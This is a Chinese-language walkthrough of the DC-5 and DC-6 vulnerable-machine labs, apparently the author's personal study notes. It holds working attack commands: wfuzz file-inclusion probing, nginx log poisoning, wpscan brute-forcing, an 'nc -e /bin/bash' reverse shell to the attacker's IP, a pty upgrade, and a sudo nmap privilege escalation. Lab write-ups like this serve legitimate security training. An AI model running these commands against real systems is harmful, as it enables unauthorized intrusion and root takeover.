【DC系列05】DC-5靶机复盘
这个靶机给我带来最大的思考就是学到了nginx的配置文件可以是一个漏洞,写入一个反弹shell进入服务器。
靶机下载地址:https://www.five86.com/downloads.html
首先对靶机进行一个ip扫描。
打开网站后点击Contact,在下面随便提交点东西。
https://s1.ax1x.com/2023/07/14/pC4RfAO.png
提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。
https://s1.ax1x.com/2023/07/14/pC4R44e.png
所以我们来扫一下这个关键目录。
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.102.143/thankyou.php?FUZZ=/etc/passwd
利用指纹识别可以发现这是个nginx服务器。
尝试查看一下nginx的日志文件,发现是可以查看的,并且里面有一些登陆记录。
用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。
利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。
发现成功拿到shell。
搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。
发现有两个可以利用的漏洞文件。
使用python先美化一下终端,
python -c "import pty;pty.spawn('/bin/bash')"
然后我们进入/tmp目录。
把漏洞文件下载到靶机中给添加一个执行权限。
执行后发现成功拿到root权限。
【DC系列06】DC-6靶机复盘
这个靶机我学会了whatweb指纹识别,同时学会了针对wordpress网站扫描的工具wpscan。
靶机下载地址:https://www.five86.com/downloads.html
我们打开这个靶机后首先还是先对靶机进行一个ip扫描,然后再单独对这个ip进行一个全局扫描。
扫描后ip地址是192.168.102.147。
我们再单独扫描一下
nmap -A 192.168.102.147 -p-
这个靶机有一个特点就是扫描到ip后,你需要往系统的hosts文件中添加一行解析,我的win10添加解析也打不开,我是在kali中弄的。
192.168.102.147 wordy
进来后发现是个wordprss的网站,通常wordpress搭建的网站都有一个readme.html信息网站和wp-login.php登陆页面,都省去扫描目录了。
也可以利用whatweb对这个网站进行一个指纹识别。
whatweb -v 192.168.102.147 指纹识别
这个靶机的说明里面给了一个密码字典,说明这个靶机是需要进行爆破的,利用wpscan可以扫描出这个网站有什么用户名。
wpscan --url http://wordy/ --enumerate u
然后再爆破就可以出来wordpress的登陆密码了。
wpscan --url http://wordy -U user -P passwords.txt
用户: mark 密码: helpdesk01
登陆上后并没有找到什么漏洞,但是发现上面安装了插件,所以就搜索了一下这个插件有没有漏洞。
发现刚好有线程的漏洞,我们下载下来。
下载打开后有一些需要修改的地方,一个是把网址改成我们的靶机地址。
其次就是反弹shell改成一下,按照我截图中的来也可以。
nc -e /bin/bash 192.168.102.129 8888
这里我们监听一下8888端口,然后利用浏览器运行一下这个漏洞文件,是一个html文件。
file:///root/45274.html
然后成功进入shell,进入后我们首先美化一下命令行。
python3 -c "import pty;pty.spawn('/bin/bash')"
在这个web shell的/home/mark/stuff目录下有一个things-to-do.txt文件,里面有graham的密码,su graham一下发现登陆上去了。
user: graham - GSo7isUM1D4
登陆上后sudo -l发现可以免密用jens的身份执行/home/jens/backups.sh文件。
往backups.sh文件中执行一个/bin/bash,当执行的时候可以返回jens的shell。
成功返回jens的shell。
进入jens后sudo -l发现可以以root权限执行nmap命令,搜索了一下nmap提权方法,以此执行以下命令就有了root权限。
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF